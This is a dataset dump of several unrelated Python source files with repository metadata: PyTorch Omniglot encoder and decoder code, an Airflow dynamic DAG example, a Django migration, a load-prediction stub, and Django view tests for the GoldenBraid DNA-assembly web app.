nn.ReLU(inplace=True), # (9*128 -> 3*3*128)
Lambda(lambda x: x.view(-1, 128, 3, 3)),
nn.ConvTranspose2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=0,
output_padding=0, bias=False), # out: 7
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1,
output_padding=1, bias=False), # out: 14
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1,
output_padding=1, bias=False), # out: 28
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(in_channels=128, out_channels=1, kernel_size=3, stride=1, padding=1,
output_padding=0, bias=True), # out: 28
#nn.Sigmoid(),
)
def forward(self, x):
recon = self.f(x)
return recon
# -
# for 56x56 size
'''
class Omniglot_Model(nn.Module):
def __init__(self):
super(Omniglot_Model, self).__init__()
# encoder
self.f = nn.Sequential(
nn.Conv2d(in_channels=1, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 56
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 28
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 28
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 14
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 14
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 7
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 7
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 3
nn.Flatten(),
nn.Linear(9*128, 1024),
)
# projection head
self.g = nn.Identity()
def forward(self, x):
feature = self.f(x)
out = self.g(feature)
return F.normalize(feature, dim=-1), F.normalize(out, dim=-1)
'''
| en | 0.449118 | # encoder # projection head # for 105x105 size class Omniglot_Model(nn.Module): def __init__(self): super(Omniglot_Model, self).__init__() # encoder self.f = nn.Sequential( nn.Conv2d(in_channels=1, out_channels=64, kernel_size=10, stride=1, padding=0), # out: 96 nn.BatchNorm2d(num_features=64), nn.ReLU(inplace=True), nn.MaxPool2d(kernel_size=2, stride=2), # out: 48 nn.Conv2d(in_channels=64, out_channels=128, kernel_size=7, stride=1, padding=0), # out: 42 nn.BatchNorm2d(num_features=128), nn.ReLU(inplace=True), nn.MaxPool2d(kernel_size=2, stride=2), # out: 21 nn.Conv2d(in_channels=128, out_channels=128, kernel_size=4, stride=1, padding=0), # out: 18 nn.BatchNorm2d(num_features=128), nn.ReLU(inplace=True), nn.MaxPool2d(kernel_size=2, stride=2), # out: 9 nn.Conv2d(in_channels=128, out_channels=128, kernel_size=4, stride=1, padding=0), # out: 6 nn.BatchNorm2d(num_features=128), nn.ReLU(inplace=True), nn.MaxPool2d(kernel_size=2, stride=2), # out: 3 nn.Flatten(), nn.Linear(9*128, 1024), ) # projection head self.g = nn.Identity() def forward(self, x): feature = self.f(x) out = self.g(feature) return F.normalize(feature, dim=-1), F.normalize(out, dim=-1) # for 28x28 size (using max_pool) # encoder # out: 28 #nn.MaxPool2d(kernel_size=2, stride=2), # out: 28 # out: 14 # out: 14 # out: 7 # out: 7 # out: 3 # projection head # for 28x28 size (not using maxpool) class Omniglot_Model(nn.Module): def __init__(self): super(Omniglot_Model, self).__init__() # encoder self.f = nn.Sequential( nn.Conv2d(in_channels=1, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 28 nn.BatchNorm2d(num_features=128), nn.ReLU(inplace=True), #nn.MaxPool2d(kernel_size=2, stride=2), nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1), # out: 14 nn.BatchNorm2d(num_features=128), nn.ReLU(inplace=True), #nn.MaxPool2d(kernel_size=2, stride=2), # out: 14 nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1), # out: 7 nn.BatchNorm2d(num_features=128), nn.ReLU(inplace=True), #nn.MaxPool2d(kernel_size=2, stride=2), # out: 7 nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=0), # out: 3 nn.BatchNorm2d(num_features=128), nn.ReLU(inplace=True), #nn.MaxPool2d(kernel_size=2, stride=2), # out: 3 nn.Flatten(), nn.Linear(9*128, 1024), ) # projection head self.g = nn.Identity() def forward(self, x): feature = self.f(x) out = self.g(feature) return F.normalize(feature, dim=-1), F.normalize(out, dim=-1) # + # for 28x28 size # reconstructer (approximately the inverse of the encoder) # (9*128 -> 3*3*128) # out: 7 # out: 14 # out: 28 # out: 28 #nn.Sigmoid(), # - # for 56x56 size class Omniglot_Model(nn.Module): def __init__(self): super(Omniglot_Model, self).__init__() # encoder self.f = nn.Sequential( nn.Conv2d(in_channels=1, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 56 nn.BatchNorm2d(num_features=128), nn.ReLU(inplace=True), nn.MaxPool2d(kernel_size=2, stride=2), # out: 28 nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 28 nn.BatchNorm2d(num_features=128), nn.ReLU(inplace=True), nn.MaxPool2d(kernel_size=2, stride=2), # out: 14 nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 14 nn.BatchNorm2d(num_features=128), nn.ReLU(inplace=True), nn.MaxPool2d(kernel_size=2, stride=2), # out: 7 nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 7 nn.BatchNorm2d(num_features=128), nn.ReLU(inplace=True), nn.MaxPool2d(kernel_size=2, stride=2), # out: 3 nn.Flatten(), nn.Linear(9*128, 1024), ) # projection head self.g = nn.Identity() def forward(self, x): feature = self.f(x) out = self.g(feature) return F.normalize(feature, dim=-1), F.normalize(out, dim=-1) | 2.700084 | 3 |
example_app/example_app/dags/dynamic_dag101.py | dhan16/airflow | 0 | 6617425 | import datetime as dt
from datetime import datetime
from airflow import DAG
from airflow.operators.python_operator import PythonOperator
default_args = {
'owner': 'me',
'start_date': dt.datetime(2018, 1, 1),
'retries': 1,
'retry_delay': dt.timedelta(minutes=5),
}
def create_dag(dag_id, schedule, dag_number, default_args):
dag = DAG(dag_id, schedule_interval=schedule, catchup=False, default_args=default_args)
def hello_world1(*args):
print('hello_world1 DAG_ID:{} This is DAG: {}'.format(dag_id, str(dag_number)))
def hello_world2(*args):
print('hello_world2 DAG_ID:{} This is DAG: {} args:{}'.format(dag_id, str(dag_number), args))
with dag:
t1 = PythonOperator(task_id='hello_world1',python_callable=hello_world1)
t2 = PythonOperator(task_id='hello_world2',python_callable=hello_world2)
return dag
# build a dag for each number in range(10)
for n in range(1, 10):
dag_id = 'dynamic_dag101_{}'.format(str(n))
globals()[dag_id] = create_dag(dag_id, '@daily', n, default_args) | import datetime as dt
from datetime import datetime
from airflow import DAG
from airflow.operators.python_operator import PythonOperator
default_args = {
'owner': 'me',
'start_date': dt.datetime(2018, 1, 1),
'retries': 1,
'retry_delay': dt.timedelta(minutes=5),
}
def create_dag(dag_id, schedule, dag_number, default_args):
dag = DAG(dag_id, schedule_interval=schedule, catchup=False, default_args=default_args)
def hello_world1(*args):
print('hello_world1 DAG_ID:{} This is DAG: {}'.format(dag_id, str(dag_number)))
def hello_world2(*args):
print('hello_world2 DAG_ID:{} This is DAG: {} args:{}'.format(dag_id, str(dag_number), args))
with dag:
t1 = PythonOperator(task_id='hello_world1',python_callable=hello_world1)
t2 = PythonOperator(task_id='hello_world2',python_callable=hello_world2)
return dag
# build a dag for each number in range(10)
for n in range(1, 10):
dag_id = 'dynamic_dag101_{}'.format(str(n))
globals()[dag_id] = create_dag(dag_id, '@daily', n, default_args) | en | 0.540912 | # build a dag for each number in range(10) | 2.842634 | 3 |
qa/migrations/0012_auto_20180225_2334.py | userimack/my_quora_app | 0 | 6617426 | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-02-25 18:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('qa', '0011_ratequestion'),
]
operations = [
migrations.AlterModelOptions(
name='answer',
options={'ordering': ['-date']},
),
migrations.AlterModelOptions(
name='category',
options={'ordering': ['-name'], 'verbose_name_plural': 'Categories'},
),
migrations.AlterModelOptions(
name='question',
options={'ordering': ['-date']},
),
migrations.AlterField(
model_name='ratequestion',
name='rating',
field=models.BooleanField(help_text='Rate the question'),
),
]
| # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-02-25 18:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('qa', '0011_ratequestion'),
]
operations = [
migrations.AlterModelOptions(
name='answer',
options={'ordering': ['-date']},
),
migrations.AlterModelOptions(
name='category',
options={'ordering': ['-name'], 'verbose_name_plural': 'Categories'},
),
migrations.AlterModelOptions(
name='question',
options={'ordering': ['-date']},
),
migrations.AlterField(
model_name='ratequestion',
name='rating',
field=models.BooleanField(help_text='Rate the question'),
),
]
| en | 0.749665 | # -*- coding: utf-8 -*- # Generated by Django 1.11 on 2018-02-25 18:04 | 1.649531 | 2 |
MiGRIDS/Model/Controls/predictLoad0.py | mmuellerstoffels/GBSTools | 8 | 6617427 | <reponame>mmuellerstoffels/GBSTools
# Project: GBS Tool
# Author: <NAME>, <EMAIL>
# Date: February 16, 2018
# License: MIT License (see LICENSE file of this package for more information)
# imports
import numpy as np
# calculate a short term future load
class predictLoad:
def __init__(self):
self.futureLoad = 0
def predictLoad(self, SO):
# simple calculation, return the mean of the last 1 hour load
#startIdx = max(SO.idx - int(3600/SO.timeStep), 0)
#stopIdx = SO.idx+1
self.futureLoad = SO.DM.realLoad1hrTrend[SO.masterIdx] #np.mean(SO.DM.realLoad[startIdx:stopIdx]) | # Project: GBS Tool
# Author: <NAME>, <EMAIL>
# Date: February 16, 2018
# License: MIT License (see LICENSE file of this package for more information)
# imports
import numpy as np
# calculate a short term future load
class predictLoad:
def __init__(self):
self.futureLoad = 0
def predictLoad(self, SO):
# simple calculation, return the mean of the last 1 hour load
#startIdx = max(SO.idx - int(3600/SO.timeStep), 0)
#stopIdx = SO.idx+1
self.futureLoad = SO.DM.realLoad1hrTrend[SO.masterIdx] #np.mean(SO.DM.realLoad[startIdx:stopIdx]) | en | 0.681462 | # Project: GBS Tool # Author: <NAME>, <EMAIL> # Date: February 16, 2018 # License: MIT License (see LICENSE file of this package for more information) # imports # calculate a short term future load # simple calculation, return the mean of the last 1 hour load #startIdx = max(SO.idx - int(3600/SO.timeStep), 0) #stopIdx = SO.idx+1 #np.mean(SO.DM.realLoad[startIdx:stopIdx]) | 2.267359 | 2 |
goldenbraid/tests/test_views.py | bioinfcomav/goldebraid | 0 | 6617428 | # Copyright 2013 <NAME>, Univ.Politecnica Valencia, Consejo Superior de
# Investigaciones Cientificas
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os.path
from cStringIO import StringIO
from django.test import TestCase, Client
from django.core.urlresolvers import reverse
from django.core.files.uploadedfile import SimpleUploadedFile
from django.conf import settings as proj_settings
from django.contrib.auth.models import User
from Bio import SeqIO
import goldenbraid
from goldenbraid.views.feature import FeatureForm
from goldenbraid.tests.test_fixtures import FIXTURES_TO_LOAD
from goldenbraid.models import Feature
from goldenbraid.tags import VECTOR_TYPE_NAME, MODULE_TYPE_NAME
TEST_DATA = os.path.join(os.path.split(goldenbraid.__path__[0])[0],
'goldenbraid', 'tests', 'data')
class FeatureTestViews(TestCase):
fixtures = FIXTURES_TO_LOAD
multi_db = True
def test_feature_page(self):
client = Client()
url = reverse('feature_view', kwargs={'uniquename': 'pAn11'})
response = client.get(url)
assert response.status_code == 200
assert "Feature pAn11" in str(response)
def test_add_feature_form(self):
test_data = os.path.join(os.path.split(goldenbraid.__path__[0])[0],
'goldenbraid', 'tests', 'data')
# test of the form
gb_path = os.path.join(test_data, 'pAn11_uniq.gb')
post_dict = {'uniquename': 'vector1', 'name': 'vector1',
'type': 'CDS', 'vector': 'pDGB1_alpha1'}
uploaded_fhand = open(gb_path)
file_dict = {'gbfile': SimpleUploadedFile(uploaded_fhand.name,
uploaded_fhand.read())}
form = FeatureForm(post_dict, file_dict)
self.assertTrue(form.is_valid())
# test of the form with blanck values
gb_path = os.path.join(test_data, 'pAn11_uniq.gb')
post_dict = {'uniquename': 'vector1', 'name': 'vector1',
'type': 'CDS', 'vector': 'pDGB1_alpha1'}
uploaded_fhand = open(gb_path)
file_dict = {}
form = FeatureForm(post_dict, file_dict)
self.assertFalse(form.is_valid())
# test of the form with wrong type
post_dict = {'uniquename': 'vector1', 'name': 'vector1',
'type': 'vecto'}
uploaded_fhand = open(gb_path)
file_dict = {'gbfile': SimpleUploadedFile(uploaded_fhand.name,
uploaded_fhand.read())}
form = FeatureForm(post_dict, file_dict)
self.assertFalse(form.is_valid())
assert form.errors.get('type')
# vector does not exist
# test of the form with wrong type
post_dict = {'uniquename': 'vector1', 'name': 'vector1',
'type': VECTOR_TYPE_NAME, 'enzyme_out': 'vector1_enz_out',
'vector': 'vector1'}
uploaded_fhand = open(gb_path)
file_dict = {'gbfile': SimpleUploadedFile(uploaded_fhand.name,
uploaded_fhand.read())}
form = FeatureForm(post_dict, file_dict)
self.assertFalse(form.is_valid())
assert form.errors.get('vector')
def test_add_feature_view(self):
# test of the form page
# test of the form
User.objects.create_user(username='admin', email='<EMAIL>',
password='password')
gb_path = os.path.join(TEST_DATA, 'pAn11_uniq.gb')
client = Client()
url = reverse('add_feature')
# no login, no access
response = client.post(url, {'name': 'vector1',
'type': MODULE_TYPE_NAME,
'description': 'vector1 desc',
'reference': 'vector1 ref',
'vector': 'pDGB1_omega1R',
'gbfile': open(gb_path)})
assert response.status_code == 302
client.login(username='admin', password='password')
# show form
response = client.get(url)
assert "pDGB1_alpha1" in str(response)
# add a feature
url = reverse('add_feature')
response = client.post(url, {'name': 'vector1',
'type': MODULE_TYPE_NAME,
'description': 'vector1 desc',
'reference': 'vector1 ref',
'vector': 'pDGB1_omega1R',
'gbfile': open(gb_path)})
assert response.status_code == 302
# TODO url to genbank file
# response = client.get('/media/genbank_files/pAn11.gb')
feat = Feature.objects.get(uniquename='pAn11_uniq')
assert feat.name == 'vector1'
assert feat.props == {u'Description': [u'vector1 desc'],
u'Reference': [u'vector1 ref']}
# add a feature
url = reverse('add_feature')
gb_path = os.path.join(TEST_DATA, 'GB_DOMEST_15.gb')
response = client.post(url, {'name': 'vector1',
'type': 'TU',
'description': 'vector1 desc',
'reference': 'vector1 ref',
'vector': 'pDGB1_alpha2',
'gbfile': open(gb_path)})
assert response.status_code == 200
os.remove(os.path.join(proj_settings.MEDIA_ROOT,
feat.genbank_file.name))
def test_search_feature(self):
client = Client()
url = reverse('search_features')
response = client.get(url)
assert response.status_code == 200
assert "<option value=" in str(response)
response = client.post(url, {'name_or_description': 'pAn11'})
assert response.status_code == 302
response = client.post(url, {'kind': 'TER'})
assert response.status_code == 200
assert "<td>This is a pGreen destiny vector of the" in str(response)
client.login(username='test', password='<PASSWORD>')
response = client.post(url, {'only_user': True})
assert response.status_code == 200
assert 'pDGB2_alpha2R' in str(response)
class MultipartiteFreeTestViews(TestCase):
fixtures = FIXTURES_TO_LOAD
multi_db = True
def test_view(self):
client = Client()
url = reverse('multipartite_view_free')
response = client.get(url)
assert "pDGB2_alpha1R" in str(response)
url = reverse('multipartite_view_free', kwargs={'form_num': '1'})
response = client.post(url, {'vector': 'pDGB2_alpha1R',
'part_1': 'pP2A11'})
assert "An11" in str(response)
url = reverse('multipartite_view_free', kwargs={'form_num': '2'})
response = client.post(url, {'vector': 'pDGB2_alpha1R',
'part_1': 'pP2A11',
'part_2': 'pLuciferas'})
assert 'feature does not exist' in str(response)
response = client.post(url, {'vector': 'pDGB2_alpha1R',
'part_1': 'pP2A11',
'part_2': 'pLuciferase'})
assert "pT35S" in str(response)
response = client.post(url, {'vector': 'pDGB2_alpha1R',
'part_1': 'pP2A11',
'part_2': 'pLuciferase',
'part_3': 'pT35S'})
assert "<p>You have assembled in the GoldenBraid" in str(response)
# reverse vector
url = reverse('multipartite_view_free_genbank')
response = client.post(url, {'part_1': 'pP2A11',
'part_2': 'pMYB12',
'part_3': 'pTerm2A11',
'vector': 'pDGB1_alpha1R'})
assert response.status_code == 200
seqrec1 = SeqIO.read(StringIO(str(response)), 'gb')
assert seqrec1.name == 'GB_UA_E'
multipartite_free_seq1 = str(seqrec1.seq)
gb_path = os.path.join(TEST_DATA, 'pEGBMybrev_uniq.gb')
seqrec2 = SeqIO.read(gb_path, 'gb')
multipartite_free_seq2 = str(seqrec2.seq)[4:]
multipartite_free_seq2 += str(seqrec2.seq)[:4]
assert multipartite_free_seq1 == multipartite_free_seq2
# with more than one part of the same type
url = reverse('multipartite_view_free', kwargs={'form_num': '5'})
response = client.post(url, {'part_1': 'pP2A11',
'part_2': 'GB0365',
'part_3': 'GB0653',
'part_4': 'GB0655',
'part_5': 'pT35S',
'vector': 'pDGB1_alpha1'})
assert "<p>Other.2:<a href='/feature/GB0655'>GB0655</a></p>" in str(response)
def test_genbank_view(self):
'it test that the genbank file is generated'
client = Client()
url = reverse('multipartite_view_free_genbank')
response = client.get(url)
assert response.status_code == 400
response = client.post(url, {'assembled_seq': 'aaa',
'vector': 'pDGB1_omega1',
'part_1': 'pPE8',
'part_2': 'pANT1',
'part_3': 'pTnos'})
assert 'GB_UA_E' in str(response)
assert 'LOCUS' in str(response)
response = client.post(url, {'assembled_seq': 'aaa',
'vector': 'pDGB1_omega1',
'part_1': 'pPE8',
'part_2': 'pANT1',
'part_3': 'pTnos'})
assert 'GB_UA_F' in str(response)
assert 'LOCUS' in str(response)
# with more than one part of the same type
response = client.post(url, {'part_1': 'pP2A11',
'part_2': 'GB0365',
'part_3': 'GB0653',
'part_4': 'GB0655',
'part_5': 'pT35S',
'vector': 'pDGB1_alpha1'})
assert '(pP2A11,GB0365,GB0653,GB0655,pT35S)pDGB1_alpha1' in str(response)
def test_protocol_view(self):
'it test that the protocol file is generated'
client = Client()
url = reverse('multipartite_view_free_protocol')
response = client.get(url)
assert response.status_code == 400
response = client.post(url, {'assembled_seq': 'aaa',
'vector': 'pDGB1_omega1',
'part_1': 'pPE8',
'part_2': 'pANT1',
'part_3': 'pTnos'})
assert "75 ng of pPE8" in str(response)
# with more than one part of the same type
response = client.post(url, {'part_1': 'pP2A11',
'part_2': 'GB0365',
'part_3': 'GB0653',
'part_4': 'GB0655',
'part_5': 'pT35S',
'vector': 'pDGB1_alpha1'})
assert "75 ng of GB0653" in str(response)
def test_mantras_bug(self):
'it test that the protocol file is generated'
client = Client()
client.login(username='admin', password='password')
url = reverse('multipartite_view_add')
response = client.get(url)
assert response.status_code == 200
response = client.post(url, {'Other': 'GB_UD_186',
'Other.2': 'GB_UD_188',
'Vector': 'pDGB1_alpha1',
'category': 'free',
'name': 'aa',
'description': '',
'reference': 'aa',
'order': 'Other:Other.2'})
class MultipartiteTestViews(TestCase):
fixtures = FIXTURES_TO_LOAD
multi_db = True
def test_empty_type(self):
client = Client()
url = reverse('multipartite_view', kwargs={'multi_type': ''})
response = client.get(url)
assert "/do/multipartite/basic" in response.content
def test_basic_type(self):
'It tests the basic typo of the form'
client = Client()
url = reverse('multipartite_view', kwargs={'multi_type': 'basic'})
response = client.post(url)
assert """<p><label for="id_TER">Ter:</label>""" in str(response)
assert """<select id="id_TER" maxlength="100" name="TER">""" in str(response)
assert """<option value="pDGB1_alpha1R">pDGB1_alpha""" in str(response)
client = Client()
url = reverse('multipartite_view', kwargs={'multi_type': 'basic'})
response = client.post(url, {"PROM+UTR+ATG": 'pPE8',
"CDS": 'pANT1',
"TER": 'pTnos',
'Vector': 'pDGB1_alpha1'})
# print response
assert 'error' not in response
assert response.status_code == 200
client = Client()
url = reverse('multipartite_view_genbank',
kwargs={'multi_type': 'basic'})
response = client.post(url, {"PROM+UTR+ATG": 'pPE8',
"CDS": 'pANT1',
"TER": 'pTnos',
'Vector': 'pDGB1_alpha1'})
assert "LOCUS" in str(response)
client = Client()
url = reverse('multipartite_view',
kwargs={'multi_type': 'basic'})
response = client.post(url, {"PROM+UTR+ATG": 'pPE8',
"CDS": 'pANT1',
"TER": 'pTno'})
err1 = """<ul class="errorlist"><li>This field is required.</li></ul"""
assert err1 in str(response)
err2 = """<ul class="errorlist"><li>This feature does not exist in"""
assert err2 in str(response)
# forward vector
url = reverse('multipartite_view_genbank',
kwargs={'multi_type': 'basic'})
response = client.post(url, {"PROM+UTR+ATG": 'pP35S',
"CDS": 'pMYB12',
"TER": 'pTnos',
'Vector': 'pDGB1_omega2'})
seqrec1 = SeqIO.read(StringIO(str(response)), 'gb')
multipartite_seq1 = str(seqrec1.seq)
gb_path = os.path.join(TEST_DATA, 'pEGBMyb_uniq.gb')
seqrec2 = SeqIO.read(gb_path, 'gb')
multipartite_seq2 = str(seqrec2.seq)
assert multipartite_seq1 == multipartite_seq2
# reverse vector
url = reverse('multipartite_view_genbank',
kwargs={'multi_type': 'basic'})
response = client.post(url, {"PROM+UTR+ATG": 'pP2A11',
"CDS": 'pMYB12',
"TER": 'pTerm2A11',
'Vector': 'pDGB1_alpha1R'})
assert response.status_code == 200
seqrec1 = SeqIO.read(StringIO(str(response)), 'gb')
multipartite_seq1 = str(seqrec1.seq)
gb_path = os.path.join(TEST_DATA, 'pEGBMybrev_uniq.gb')
seqrec2 = SeqIO.read(gb_path, 'gb')
multipartite_seq2 = str(seqrec2.seq)[4:]
multipartite_seq2 += str(seqrec2.seq)[:4]
assert multipartite_seq1 == multipartite_seq2
def test_protocol_view(self):
'it test that the protocol file is generated'
client = Client()
url = reverse('multipartite_view_protocol')
response = client.get(url)
assert response.status_code == 400
response = client.post(url, {'assembled_seq': 'aaa',
'multi_type': 'basic',
"PROM+UTR+ATG": 'pPE8',
"CDS": 'pANT1',
"TER": 'pTnos',
'Vector': 'pDGB1_alpha1'})
assert "75 ng of pPE8" in str(response)
def test_genbank_view(self):
'it test that the protocol file is generated'
client = Client()
url = reverse('multipartite_view_genbank', kwargs={'multi_type':
'basic'})
response = client.get(url)
assert response.status_code == 400
response = client.post(url, {'assembled_seq': 'aaa',
'multi_type': 'basic',
"PROM+UTR+ATG": 'pPE8',
"CDS": 'pANT1',
"TER": 'pTnos',
'Vector': 'pDGB1_alpha1'})
assert 'LOCUS' in str(response)
class BipartiteViewTest(TestCase):
fixtures = FIXTURES_TO_LOAD
multi_db = True
def test_bipartite(self):
client = Client()
# do initial
url = reverse('bipartite_view')
response = client.get(url)
assert """<option value="GB0125">GB0125 - pEGB 35S:Rosea:Tnos</option>""" in str(response)
# do page 1
url = reverse('bipartite_view', kwargs={'form_num': '1'})
response = client.post(url, {'part_1': 'GB0125'})
assert 'readonly' in str(response)
assert 'value="GB0125"' in str(response)
assert """<p><label for="id_part_2">Part 2:</label>""" in str(response)
# do page 2
url = reverse('bipartite_view', kwargs={'form_num': '2'})
response = client.post(url, {'part_1': 'GB0125', 'part_2': 'GB0126'})
assert 'value="GB0126"' in str(response)
assert "pDGB1_omega1" in str(response)
# do page 3
url = reverse('bipartite_view', kwargs={'form_num': '3'})
response = client.post(url, {'part_1': 'GB0125', 'part_2': 'GB0126',
'Vector': 'pDGB1_omega1'})
assert """<INPUT type="hidden" name="Vector" value="pDGB1_omega1">""" in str(response)
assert """ <p>The resulted sequence of the assembly is""" in str(response)
# forward vector
url = reverse('bipartite_view_genbank')
response = client.post(url, {'part_1': 'GB0129',
'part_2': 'GB0131',
'Vector': 'pDGB1_alpha1'})
assert response.status_code == 200
seqrec1 = SeqIO.read(StringIO(str(response)), 'gb')
bipartite_seq1 = str(seqrec1.seq)
gb_path = os.path.join(TEST_DATA, 'pEGBRosDelMyb.gb')
seqrec2 = SeqIO.read(gb_path, 'gb')
bipartite_seq2 = str(seqrec2.seq)
assert bipartite_seq1 == bipartite_seq2
# check bipartite_view_genbank
def test_genbank_view(self):
'it test that the genbank file is generated'
client = Client()
url = reverse('bipartite_view_genbank')
response = client.get(url)
assert response.status_code == 400
response = client.post(url, {'assembled_seq':'aaa',
'part_1': 'GB0125',
'part_2': 'GB0126',
'Vector': 'pDGB1_omega1'})
assert 'LOCUS' in str(response)
# check bipartite_view_protocol
def test_protocol_view(self):
'it test that the protocol file is generated'
client = Client()
url = reverse('bipartite_view_protocol')
response = client.get(url)
assert response.status_code == 400
response = client.post(url, {'name': 'kk',
'Description': 'desc',
'Reference': 'ref',
'assembled_seq': 'aaa',
'part_1': 'GB0125',
'part_2': 'GB0126',
'Vector': 'pDGB1_omega1'})
assert 'Bipartite Assembly Protocol' in str(response)
# check bipartite_view_add
def test_add_view(self):
'it test that the protocol file is generated'
User.objects.create_user(username='admin', email='<EMAIL>',
password='password')
client = Client()
client.login(username='admin', password='password')
url = reverse('bipartite_view_add')
response = client.get(url)
assert response.status_code == 200
response = client.post(url, {'assembled_seq': 'aaa',
'part_1': 'GB0125',
'part_2': 'GB0126',
'Vector': 'pDGB1_omega1',
'name': 'aa',
'description': '',
'reference': 'aa'})
assert response.status_code == 302
class DomesticationViewTest(TestCase):
fixtures = FIXTURES_TO_LOAD
multi_db = True
def test_domestication(self):
client = Client()
# do initial
url = reverse('domestication_view')
response = client.get(url)
assert ("""<option value="NTAG (B2)">NTAG (B2)</option>""") in str(response)
# send data to formulary to test validations
gb_path = os.path.join(TEST_DATA, 'domseq.gb')
# add seq and category
response = client.post(url, {'seq': open(gb_path),
'category': 'NTAG (B2)'})
# print str(response)
assert """<ul class="errorlist"><li>The provided s""" in str(response)
# not add a sequence
response = client.post(url, {'seq': '',
'category': 'NTAG (B2)'})
assert """<ul class="errorlist"><li>Fasta or genbank File Required</li></ul>""" in str(response)
# add category, prefix and suffix
response = client.post(url, {'seq': open(gb_path),
'prefix': 'ggac', 'suffix': 'cgtc',
'category': '3UTR+TERM (B6-C1)'})
assert """<ul class="errorlist"><li>Can not use category and prefix/suffix simoultaneously</li></ul>"""in str(response)
# add category and suffix
response = client.post(url, {'seq': open(gb_path),
'prefix': '', 'suffix': 'cgtc',
'category': '3UTR+TERM (B6-C1)'})
assert """<ul class="errorlist"><li>Can not use category and prefix/suffix simoultaneously</li></ul>"""in str(response)
# add suffix
response = client.post(url, {'seq': open(gb_path),
'prefix': '', 'suffix': 'cgtc',
'category': ''})
assert """<ul class="errorlist"><li>You must provide prefix and suffix together</li></ul>""" in str(response)
# not add category nor prefix and suffix
response = client.post(url, {'seq': open(gb_path),
'prefix': '', 'suffix': '', 'category': ''})
assert """<ul class="errorlist"><li>At least we need category or prefix/suffix pair</li></ul>""" in str(response)
# check that uses validators
response = client.post(url, {'seq': open(gb_path),
'category': 'CDS (B3-B4-B5)'})
assert 'The provided seq must start with start' in str(response)
response = client.post(url, {'seq': open(gb_path),
'category': 'goi (B2-B3)'})
assert 'The provided seq must have less' in str(response)
# sequence start with atg
fasta_path = os.path.join(TEST_DATA, 'domseqatg.fasta')
response = client.post(url, {'seq': open(fasta_path),
'category': 'SP (B3)'})
assert 'The provided seq must start with start' not in str(response)
# domesticate with prefix and suffix
response = client.post(url, {'seq': open(gb_path),
'suffix': 'ACCT', 'prefix': 'TTCC'})
assert "<p>Prefix:TTCC</p>" in str(response)
residues = str(SeqIO.read(open(gb_path), format='gb').seq)
response = client.post(url, {'residues': residues,
'category': 'CDS (B3-B4-B5)'})
assert 'The provided seq must start with start' in str(response)
def test_genbank_view(self):
'it test that the genbank file is generated'
client = Client()
url = reverse('domestication_view_genbank')
response = client.get(url)
assert response.status_code == 400
response = client.post(url, {'seq': 'gagaggggggggagagagattcccctctccccccccccccccccccccccccccccccccccccctttgacctcgaaacgccccc',
'prefix': 'ggag',
'suffix': 'aatg',
'category': 'PROM+5UTR+NTAG (A1-A2-A3-B1-B2)',
'seq_name': 'test',
'with_intron': '0'})
assert 'LOCUS' in str(response)
# check bipartite_view_protocol
def test_protocol_view(self):
'it test that the protocol file is generated'
client = Client()
url = reverse('domestication_view_protocol')
response = client.get(url)
assert response.status_code == 400
response = client.post(url, {'seq': 'gagaggggggggagagagattcccctctccccccccccccccccctccccccccccccccccccccccccccctttgacctcgaaacgccccc',
'prefix': 'ggag',
'suffix': 'aatg',
'category': 'PROM+5UTR+NTAG (A1-A2-A3-B1-B2)',
'seq_name': 'test',
'with_intron': '0'})
assert "Oligo forward: GCGCCGTCTCGCTCGGGAGGAGAGGGGGGGGAGAGAGAT" in str(response)
| # Copyright 2013 <NAME>, Univ.Politecnica Valencia, Consejo Superior de
# Investigaciones Cientificas
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os.path
from cStringIO import StringIO
from django.test import TestCase, Client
from django.core.urlresolvers import reverse
from django.core.files.uploadedfile import SimpleUploadedFile
from django.conf import settings as proj_settings
from django.contrib.auth.models import User
